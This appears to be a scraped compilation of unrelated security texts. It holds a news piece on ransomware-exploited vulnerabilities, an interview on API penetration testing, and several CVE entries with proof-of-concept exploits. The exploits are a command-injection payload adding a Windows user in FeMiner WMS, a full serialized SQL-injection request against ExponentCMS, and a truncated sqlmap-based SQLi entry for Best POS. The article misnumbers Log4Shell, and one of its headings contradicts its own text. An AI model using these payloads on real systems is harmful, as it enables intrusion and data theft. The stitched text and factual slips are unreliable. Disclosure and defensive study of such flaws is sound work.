New research shows that 57 vulnerabilities that threat actors are currently using in ransomware attacks enable everything from initial access to data theft.

Many vulnerabilities that ransomware operators used in 2022 attacks were years old and paved the way for the attackers to establish persistence and move laterally in order to execute their missions.

The vulnerabilities, in products from Microsoft, Oracle, VMware, F5, SonicWall, and several other vendors, present a clear and present danger to organizations that haven't remediated them yet, a new report from Ivanti revealed this week.

**Old Vulns Still Popular**

Ivanti's report is based on an analysis of data from its own threat intelligence team and from those at Securin, Cyber Security Works, and Cyware. It offers an in-depth look at vulnerabilities that bad actors commonly exploited in ransomware attacks in 2022.

Ivanti's analysis showed that ransomware operators exploited a total of 344 unique vulnerabilities in attacks last year—an increase of 56 compared to 2021. Of this, a startling 76% of the flaws were from 2019 or before. The oldest vulnerabilities in the set were in fact three remote code execution (RCE) bugs from 2012 in Oracle's products: CVE-2012-1710 in Oracle Fusion middleware and CVE-2012-1723 and CVE-2012-4681 in the Java Runtime Environment.

Srinivas Mukkamala, Ivanti’s chief product officer, says that while the data shows ransomware operators weaponized new vulnerabilities faster than ever last year, many continued to rely on old vulnerabilities that remain unpatched on enterprise systems. 

"Older flaws being exploited is a by-product of the complexity and time-consuming nature of patches," Mukkamala says. "This is why organizations need to take a risk-based vulnerability management approach to prioritize patches so that they can remediate vulnerabilities that pose the most risk to their organization."

**The Biggest Threats**

Among the vulnerabilities that Ivanti identified as presenting the greatest danger were 57 that the company described as offering threat actors capabilities for executing their entire mission. These were vulnerabilities that allow an attacker to gain initial access, achieve persistence, escalate privileges, evade defenses, access credentials, discover assets they might be looking for, move laterally, collect data, and execute the final mission.

The three Oracle bugs from 2012 were among 25 vulnerabilities in this category that were from 2019 or older. Exploits against three of them (CVE-2017-18362, CVE-2017-6884, and CVE-2020-36195) in products from ConnectWise, Zyxel, and QNAP, respectively, are not currently being detected by scanners, Ivanti said.

A plurality (11) of the vulnerabilities in the list that offered a complete exploit chain stemmed from improper input validation. Other common causes for vulnerabilities included path traversal issues, OS command injection, out-of-bounds write errors, and SQL injection. 

**Widely Prevalent Flaws Are Most Popular**

Ransomware actors also tended to prefer flaws that exist across multiple products. One of the most popular among them was CVE-2018-3639, a type of speculative side-channel vulnerability that Intel disclosed in 2018. The vulnerability exists in 345 products from 26 vendors, Mukkamala says. Other examples include CVE-2021-4428, the infamous Log4Shell flaw, which at least six ransomware groups are currently exploiting. The flaw is among those that Ivanti found trending among threat actors as recently as December 2022. It exists in at least 176 products from 21 vendors including Oracle, Red Hat, Apache, Novell, and Amazon.

Two other vulnerabilities ransomware operators favored because of their widespread prevalence are CVE-2018-5391 in the Linux kernel and CVE-2020-1472, a critical elevation of privilege flaw in Microsoft Netlogon. At least nine ransomware gangs including those behind Babuk, CryptoMix, Conti, DarkSide, and Ryuk, have used the flaw, and it continues to trend in popularity among others as well, Ivanti said.

In total, the security found that some 118 vulnerabilities that were used in ransomware attacks last year were flaws that existed across multiple products.

"Threat actors are very interested in flaws that are present in most products," Mukkamala says.

**None on the CISA List**

Notably, 131 of the 344 flaws that ransomware attackers exploited last year are not included in the US Cybersecurity and Infrastructure Security Agency's closely followed Known Exploited Vulnerabilities (KEV) database. The database lists software flaws that threat actors are actively exploiting and which CISA assesses as being especially risky. CISA requires federal agencies to address vulnerabilities listed in the database on a priority basis and usually within two weeks or so.

"It's significant that these aren't in CISA's KEV because many organizations use the KEV to prioritize patches," Mukkamala says. That shows that while KEV is a solid resource, it doesn't provide a full view of all the vulnerabilities being used in ransomware attacks, he says.

Ivanti found that 57 vulnerabilities used in ransomware attacks last year by groups such as LockBit, Conti, and BlackCat, had low- and medium-severity scores in the national vulnerability database. The danger: this could lull organizations who use the score to prioritize patching into a false sense of security, the security vendor said.

Majority of Ransomware Attacks Last Year Exploited Old Bugs

API security is a ‘great gateway’ into a pen testing career, advises specialist in the field

API security is a ‘great gateway’ into a pen testing career, advises specialist in the field

INTERVIEW Securing web APIs requires a different approach to classic web application security, as standard tests routinely miss the most common vulnerabilities.

This is the view of API security expert Corey J Ball, who warns that methods that aren’t calibrated to web APIs can result in false-negative findings for pen testers.

After learning his craft in web application penetration testing in 2015 via hacking books, HackTheBox, and VulnHub, Ball further honed his skills on computers running Cold Fusion, WordPress, Apache Tomcat, and other enterprise-focused web applications.

Read more of the latest interviews with industry experts

He subsequentially obtained CEH, CISSP, and OSCP certificates before eventually being offered an opportunity to help lead penetration testing services at public accounting firm Moss Adams, where he still works as lead web app pen tester.

Recently focusing more narrowly on web API security – a largely underserved area – Ball has launched a free online course on the topic and published Hacking APIs: Breaking Web Application Programming Interfaces (No Starch Press, 2022).

In an interview with The Daily Swig, Ball explains how the growing use of web APIs requires a change of perspective on how we secure our applications.

**Attractive attack vector**

The past few years have seen accelerating adoption of web APIs in various sectors. In 2018, Akamai reported that API calls accounted for 83% of web traffic.

“Businesses realized they no longer need to be generalists that have to develop every aspect of their application (maps, payment processing, communication, authentication, etc),” Ball says. “Instead, they can use web APIs to leverage the work that has been done by third parties and focus on specializing.”

API stands for application programming interface, a set of definitions and protocols for building and integrating application software.

Web APIs, which can be accessed with the HTTP protocol, have spawned API services that monetize their technology, infrastructure, functionality, and data. But APIs have attracted the attention of cybercriminals too.

“Insecure APIs can be used to compromise confidentiality, integrity, and availability,” Ball says. “This potential combined with the fact many APIs are internet-facing means vulnerable APIs make for one of the best attack vectors.”

**Different rules apply**

APIs can become less of a liability by including security-focused team members during design, encouraging secure coding, conducting regular security tests, and monitoring programming calls for attacks and misuse.

Securing web APIs requires a different approach to classic web application security, according to Ball.

“Standard web application tests will result in false-negative findings for web APIs,” he explains. “Tools and techniques that are not calibrated specifically to web APIs will miss on nearly all of the common vulnerabilities.”

A notable example is a vulnerability in the USPS Informed Visibility API, first reported by security researcher Brian Krebs. The web application was thoroughly tested one month before Krebs reported the data exposure.

DON’T MISS How to become a penetration tester: Part 1 – your path into offensive security testing

During testing, tools like Nessus and HP WebInspect were applied generically to the testing targets, and therefore a significant web API vulnerability went undetected. This undiscovered security flaw, in the USPS Informed Visibility API, allowed any authenticated user to obtain access to email addresses, usernames, package updates, mailing addresses, and phone numbers associated with 60 million customers.

“The vulnerability assessment of the Informed Visibility system’s external attack surface is a great demonstration of what can happen if web application hacking techniques are applied to APIs,” Ball says. “The lesson here is that the right tools and techniques must be applied when testing APIs.”

**Side-channel API attacks**

Ball himself has found quite a few bugs through API-focused pen testing. His favorite discovery is a side-channel timing attack that exfiltrated information from an administrative API used for searching client records.

Normally, the API would reject all unauthorized requests and return a standard HTTP 401 Unauthorized response. Since the API lacked rate limiting, Ball could send many requests, testing different user IDs and names collected during passive reconnaissance. The security researcher realized that certain responses had slightly more bytes than others.

“Upon closer inspection (using Comparer), it became clear that a middleware header revealed how much longer the server would take to process certain requests,” he says. “I discovered requests that involved existing records took the server five times longer to process than non-existing records.”

Ball’s favorite find was a timing attack that exfiltrated info from an admin API used for searching client records

By piecing together various items of disclosed information, Ball was able to gather sensitive information and associate users with their user ID, zip code, phone number, health records, and SSN (social security number).

“I did not need to exfiltrate the external network, bypass a firewall, pivot within the network, and finally gain access to the right database and find a way to exfiltrate data; instead I used a web API to reveal the crown jewels,” Ball concluded.

**Opportunity knocks**

Despite web APIs becoming an increasingly popular attack vector, Ball noticed a dearth of resources about testing them for vulnerabilities before specializing in the subject himself.

“There were no books focusing on API security testing, no certifications, few blog posts \[or\] videos, etc,” he says. “I went to conferences and asked the speakers giving the latest web app hacking talks what they did for API security testing. They either had no clue what to do with APIs or there was just one person on their team that knew how to test APIs.”

Catch up on the latest web API-related security news and analysis

One of the partners at Moss Adams encouraged Ball to become an API subject matter expert. In a few months, Ball duly compiled around 150 pages of notes on the topic before realizing he was halfway through writing a book on API security.

“I saw an opportunity to share my research, to arm the testers, and help prevent that next API-related data breach,” he says. “I connected with No Starch Press. The rest is history.”

Ball has also released a free online course at APIsec University, in which he teaches different phases of the API pen testing process, including setting up a lab, doing reconnaissance, analyzing endpoints, and staging various attacks.

**UnAPI days**

Resources and standards around API security are gradually taking shape, including the publication of the top 10 API vulnerabilities by the Open Source Web Application Project (OWASP) in 2019.

However, Ball continues to see certain commonplace API security mistakes proliferating across the web. “Authorization continues to be the top API security mistake out in the wild,” he says.

He frequently sees instances of broken object level authorization and broken function level authorization, both entries on OWASP’s league table. In most cases, these vulnerabilities manifest themselves as one authenticated user being able to use the API to gain unauthorized access to the data of other users.

“With the prevalence of API authorization vulnerabilities, it seems there is both too much trust of valid users and not enough testing to make sure users and groups cannot access or alter each other’s data,” Ball says.

**Gateway bug**

As APIs continue to become more prevalent, there is a growing need for API security experts.

“I believe APIs are actually a great gateway for anyone interested in becoming a pen tester. APIs could be the first thing a new hacker hacks,” Ball says.

Where to learn about API security? Ball suggests the following resources:

*   API Penetration Testing at APIsec University
*   PortSwigger’s\* Web Security Academy
*   OWASP API Security Project

“Get very familiar with Postman and Burp Suite,” Ball advises. “Of course, if you’d like to do all of this from a single source, check out my book, Hacking APIs.”

\*PortSwigger is the parent company of The Daily Swig

RELATED API security: Broken access controls, injection attacks plague enterprise security landscape in 2022

‘Most web API flaws are missed by standard security tests’ – Corey J Ball on securing a neglected attack vector

An issue in FeMiner WMS v1.1 allows attackers to execute arbitrary code via the filename parameter and the exec function.

**Vulnerability Type :**

Command execution

**Vulnerability Version :**

1.1

**Recurring environment:**

Windows Server 2012  
PHP 5.5.38  
Apache 2.4  
Mysql 5.6

**Vulnerability Description AND recurrence:**

During installation, use the db\_wms\_2013\_12\_31\_15\_48\_34.sql file in the \\system\\ directory for installation

In the /system/databak.php file, the parameter filename was received through $\_POST, and it was not filtered. The exec function was brought in, resulting in a command execution vulnerability.

There is no echo here, let's test adding a system user here  

payload： filename=1 || net user test /add

CVE-2021-33949: Command execution vulnerability in /wms/src/system/databak.php · Issue #10 · FeMiner/wms

An issue discovered in OpenKM v6.3.10 allows attackers to obtain sensitive information via the XMLTextExtractor function.

@@ -69,8 +69,10 @@ public String extractText(InputStream stream, String type, String encoding) thro saxParserFactory.setValidating(false); SAXParser saxParser = saxParserFactory.newSAXParser(); XMLReader xmlReader = saxParser.getXMLReader(); xmlReader.setFeature("http://xml.org/sax/features/validation", false); xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false); xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false); xmlReader.setFeature("http://xml.org/sax/features/validation", false);  
ZipInputStream zis = new ZipInputStream(stream); ZipEntry ze = zis.getNextEntry();

CVE-2021-33950: XXE injection security vulnerability · openkm/document-management-system@ce1d823

SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class.

**Vulnerability Info****Vulnerability Type**

ExponentCMS unauthticate sql injection

**Vulnerability Version**

v2.6.0

exponentcms/exponent-cms#1542

**Recurring environment**

*   Windows 10\* PHP 5.4.5\* Apache 2.4.23

**Author**

pang0lin@webray.com.cn inc.

**Vulnerability Description AND recurrence:**

1.  The security issue is occured at file \\framework\\modules\\eaas\\controllers\\eaasController.php The line number nearby 76.
    
        public function api() {
             if (empty($this->params['apikey'])) {
                 $_REQUEST['apikey'] = true;  // set this to force an ajax reply
                 $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
                 $ar->send();  //FIXME this doesn't seem to work correctly in this scenario
             } else {
                 $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));  //step 1
                 if (is_object($key) && $key->mod === "eaas") {
                     preg_match('/[a-zA-Z0-9_@]*/', $key->src, $matches);
                     $key->src = $matches[0];
                     // var_dump($key);
                     $cfg = new expConfig($key); // step 2
                     $this->config = $cfg->config;
                     $cfg = new expConfig($key);
                     $this->config = $cfg->config;
                 }
                 if(empty($cfg->id)) {
                     $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
                     $ar->send();
                 } else {
                     if (!empty($this->params['get'])) {
                         $this->handleRequest();
                     } else {
                         $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
                         $ar->send();
                     }
                 }
             }
         }
        
    

2.  We can see issue with steps. step 1. The user's input apikey can be decoded with base64 and serilized.

step 2. The key goes into class of 'expConfig'. we try to find the definition.

        class expConfig extends expRecord {
    	protected $table = 'expConfigs';
    
    	function __construct($params=null) {
    		global $db;
    
            if (!is_array($params)) {
                $this->location_data = serialize($params);
                parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));  //step 3
            } else {
                parent::__construct($params);
            }
    
    		// treat the loc data like an id - if the location data come thru as an object we need to look up the record
                //         if (!empty($params->src)) {
                //             echo "1";
                //             // if we hav a src, ie this controller has sources
                // parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));
                //         } else {
                //             echo "2";
                //             // if we don't have a sourced controller, might still have a config for it.
                // parent::__construct($db->selectValue($this->table, 'id'));
                //}
    		$this->config = expUnserialize($this->config);
            if (!is_array($this->config)) {
                $this->config = array();
            }
            // now to artificially attach any file objects to the config
            if (!empty($this->config['expFile'])) {
                foreach ($this->config['expFile'] as $type=>$file) {
                    if (is_array($file)) foreach ($file as $key=>$filenum) {
                        if (is_numeric($filenum)) {
                            $this->config['expFile'][$type][$key] = new expFile($filenum);
                        } elseif (!is_object($filenum)) {
                            unset($this->config['expFile'][$type][$key]);
                        }
                    }
                }
            }
    	}
    

3.  At step 3. We can see the variable '$this->location\_data' derectly use by function 'selectValue' without any filter.Try to find the definition.

            /**
        * @param  $table
        * @param  $col
        * @param null $where
        * @return null
        */
       function selectValue($table, $col, $where=null) {
           if ($where == null)
               $where = "1";
           $sql = "SELECT " . $col . " FROM `" . $this->prefix . "$table` WHERE $where LIMIT 0,1";  //step 4
      
           $res = @mysqli_query($this->connection, $sql);
    
           if ($res == null)
               return null;
           $obj = mysqli_fetch_object($res);
           if (is_object($obj)) {
               return $obj->$col;
           } else {
               return null;
           }
       }
    

4.  Now. it's clearly to understand the issue. The user input is like . $a = new eaasController();$a->mod = 'eaas';$a->src="aaaaaabbbb";$a->abc="1' union select sleep(5) -- a";var\_dump(urlencode(base64\_encode(serialize($a)))); then, we can use this payload to test if the target is vulnerable. If the target is vulnerable, the request will use more than 10s.

    POST /index.php HTTP/1.1
    Host: exponentcms.org
    
    controller=eaas&action=api&get=photos&apikey=TzoxNDoiZWFhc0NvbnRyb2xsZXIiOjI4OntzOjExOiJ1c2VyYWN0aW9ucyI7YToxOntzOjc6InNob3dhbGwiO3M6MTk6Ikluc3RhbGwgU2VydmljZSBBUEkiO31zOjE0OiJyZW1vdmVfY29uZmlncyI7YToxMDp7aTowO3M6MTE6ImFnZ3JlZ2F0aW9uIjtpOjE7czoxMDoiY2F0ZWdvcmllcyI7aToyO3M6ODoiY29tbWVudHMiO2k6MztzOjc6ImVhbGVydHMiO2k6NDtzOjg6ImZhY2Vib29rIjtpOjU7czo1OiJmaWxlcyI7aTo2O3M6MTA6InBhZ2luYXRpb24iO2k6NztzOjM6InJzcyI7aTo4O3M6NDoidGFncyI7aTo5O3M6NzoidHdpdHRlciI7fXM6NDoidGFicyI7YTo3OntzOjc6ImFib3V0dXMiO3M6ODoiQWJvdXQgVXMiO3M6NDoiYmxvZyI7czo0OiJCbG9nIjtzOjU6InBob3RvIjtzOjY6IlBob3RvcyI7czo1OiJtZWRpYSI7czo1OiJNZWRpYSI7czo1OiJldmVudCI7czo2OiJFdmVudHMiO3M6MTI6ImZpbGVkb3dubG9hZCI7czoxNDoiRmlsZSBEb3dubG9hZHMiO3M6NDoibmV3cyI7czo0OiJOZXdzIjt9czo3OiIAKgBkYXRhIjthOjA6e31zOjEyOiIAKgBjbGFzc25hbWUiO3M6MTQ6ImVhYXNDb250cm9sbGVyIjtzOjEzOiJiYXNlY2xhc3NuYW1lIjtzOjQ6ImVhYXMiO3M6OToiY2xhc3NpbmZvIjtOO3M6MTQ6ImJhc2Vtb2RlbF9uYW1lIjtzOjk6ImV4cFJlY29yZCI7czoxMToibW9kZWxfdGFibGUiO047czoxNDoiACoAcGVybWlzc2lvbnMiO2E6NTp7czo2OiJtYW5hZ2UiO3M6NjoiTWFuYWdlIjtzOjk6ImNvbmZpZ3VyZSI7czo5OiJDb25maWd1cmUiO3M6NjoiY3JlYXRlIjtzOjY6IkNyZWF0ZSI7czo0OiJlZGl0IjtzOjQ6IkVkaXQiO3M6NjoiZGVsZXRlIjtzOjY6IkRlbGV0ZSI7fXM6MTY6IgAqAG1fcGVybWlzc2lvbnMiO2E6Njp7czo4OiJhY3RpdmF0ZSI7czo4OiJBY3RpdmF0ZSI7czo3OiJhcHByb3ZlIjtzOjc6IkFwcHJvdmUiO3M6NToibWVyZ2UiO3M6NToiTWVyZ2UiO3M6NjoicmVyYW5rIjtzOjY6IlJlUmFuayI7czo2OiJpbXBvcnQiO3M6MTI6IkltcG9ydCBJdGVtcyI7czo2OiJleHBvcnQiO3M6MTI6IkV4cG9ydCBJdGVtcyI7fXM6MjE6IgAqAHJlbW92ZV9wZXJtaXNzaW9ucyI7YTowOnt9czoxODoiACoAYWRkX3Blcm1pc3Npb25zIjthOjA6e31zOjIxOiIAKgBtYW5hZ2VfcGVybWlzc2lvbnMiO2E6MDp7fXM6MTQ6InJlcXVpcmVzX2xvZ2luIjthOjA6e31zOjg6ImZpbGVwYXRoIjtzOjgwOiIvcGhwc3R1ZHlfcHJvL1dXVy9leHBvbmVudC9mcmFtZXdvcmsvbW9kdWxlcy9lYWFzL2NvbnRyb2xsZXJzL2VhYXNDb250cm9sbGVyLnBocCI7czo4OiJ2aWV3cGF0aCI7czo2MDoiL3BocHN0dWR5X3Byby9XV1cvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy92aWV3cy9lYWFzIjtzOjE3OiJyZWxhdGl2ZV92aWV3cGF0aCI7czoxNToiZWFhcy92aWV3cy9lYWFzIjtzOjEwOiJhc3NldF9wYXRoIjtzOjQwOiIvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy9hc3NldHMvIjtzOjY6ImNvbmZpZyI7YTowOnt9czo2OiJwYXJhbXMiO2E6MDp7fXM6MzoibG9jIjtPOjg6InN0ZENsYXNzIjozOntzOjM6Im1vZCI7czo0OiJlYWFzIjtzOjM6InNyYyI7czowOiIiO3M6MzoiaW50IjtzOjA6IiI7fXM6MTE6ImNvZGVxdWFsaXR5IjtzOjY6InN0YWJsZSI7czoxNDoicnNzX2lzX3BvZGNhc3QiO2I6MDtzOjQ6ImVhYXMiO086OToiZXhwUmVjb3JkIjoyMzp7czoxMjoiACoAY2xhc3NpbmZvIjtOO3M6OToiY2xhc3NuYW1lIjtzOjk6ImV4cFJlY29yZCI7czo5OiJ0YWJsZW5hbWUiO3M6OToiZXhwUmVjb3JkIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI6ImlkIjtzOjEzOiJyYW5rX2J5X2ZpZWxkIjtzOjA6IiI7czoxMjoiZ3JvdXBpbmdfc3FsIjtzOjA6IiI7czoxOToiaGFzX2V4dGVuZGVkX2ZpZWxkcyI7YTowOnt9czo3OiJoYXNfb25lIjthOjA6e31zOjg6Imhhc19tYW55IjthOjA6e31zOjEzOiJoYXNfbWFueV9zZWxmIjthOjA6e31zOjIzOiJoYXNfYW5kX2JlbG9uZ3NfdG9fbWFueSI7YTowOnt9czoyMzoiaGFzX2FuZF9iZWxvbmdzX3RvX3NlbGYiO2E6MDp7fXM6MTg6ImRlZmF1bHRfc29ydF9maWVsZCI7czowOiIiO3M6MjI6ImRlZmF1bHRfc29ydF9kaXJlY3Rpb24iO3M6MDoiIjtzOjEzOiJnZXRfYXNzb2NfZm9yIjthOjA6e31zOjI0OiIAKgBhdHRhY2hhYmxlX2l0ZW1fdHlwZXMiO2E6MDp7fXM6MjQ6ImF0dGFjaGFibGVfaXRlbXNfdG9fc2F2ZSI7TjtzOjE4OiJnZXRfYXR0YWNoYWJsZV9mb3IiO2E6MDp7fXM6ODoidmFsaWRhdGUiO2E6MDp7fXM6OToidmFsaWRhdGVzIjthOjA6e31zOjE1OiJkb19ub3RfdmFsaWRhdGUiO2E6MDp7fXM6MTg6InN1cHBvcnRzX3JldmlzaW9ucyI7YjowO3M6MTQ6Im5lZWRzX2FwcHJvdmFsIjtiOjA7fXM6MzoibW9kIjtzOjQ6ImVhYXMiO3M6Mzoic3JjIjtzOjEwOiJhYWFhYWFiYmJiIjtzOjM6ImFiYyI7czoyOToiMScgdW5pb24gc2VsZWN0IHNsZWVwKDUpIC0tIGEiO30%3D

CVE-2021-32441: CVEproject/ExponentCMS_v2.6.0_sqli.md at main · pang0lin/CVEproject

IBM Aspera Faspex 4.4.1 could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.

**Security Bulletin**

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Faspex 4.4.2 PL2.

**Vulnerability Details**

**CVEID:**   CVE-2022-28330  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability to read beyond bounds when configured to process requests with the mod\_isapi module.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228341 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2023-22868  
**DESCRIPTION:**   IBM Aspera Faspex is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244117 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2022-30556  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by an error in mod\_lua with websockets. An attacker could exploit this vulnerability to return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228336 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-31813  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to bypass security restrictions, caused by the failure to send the X-Forwarded-\* headers to the origin server based on client side Connection header hop-by-hop mechanism. An attacker could exploit this vulnerability to bypass IP based authentication on the origin server/application.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228337 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-30522  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to a denial of service when configured to do transformations with mod\_sed in contexts where the input to mod\_sed may be very large. By making excessively large memory allocations, a remote attacker could exploit this vulnerability to trigger an abort.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228338 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-47986  
**DESCRIPTION:**   IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-28615  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by a read beyond bounds in ap\_strcmp\_match() when provided with an extremely large input buffer. An attacker could exploit this vulnerability to crash or disclose information.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228340 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)

**CVEID:**   CVE-2022-26377  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to HTTP request smuggling, caused by an inconsistent Interpretation of HTTP Requests vulnerability in mod\_proxy\_ajp. An attacker could exploit this vulnerability to smuggle requests to the AJP server it forwards requests to.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228343 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2018-25032  
**DESCRIPTION:**   Zlib is vulnerable to a denial of service, caused by a memory corruption in the deflate operation. By using many distant matches, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222615 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-2068  
**DESCRIPTION:**   OpenSSL could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the c\_rehash script. By sending a specially-crafted request using shell metacharacters, an attacker could exploit this vulnerability to execute arbitrary commands with the privileges of the script on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/226018 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

IBM Aspera Faspex 4.4.1 and earlier

**Remediation/Fixes**

It is recommended to apply the fix as soon as possible, see link below.

**Product(s)**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Faspex

4.4.2 PL2

Windows

click here

IBM Aspera Faspex

4.4.2 PL2

Linux

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

CVE-2023-22868 and CVE-2022-47986 were reported to IBM by Max Garrett - Assetnote

**Change History**

26 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"4.4.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-47986: IBM Aspera Faspex 4.4.2 PL2 has addressed multiple vulnerabilities (CVE-2022-28330, CVE-2023-22868, CVE-2022-30556, CVE-2022-31813, CVE-2022-30522, CVE-2022-47986, CVE-2022-28615, CVE-2022-26377, CVE-

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - 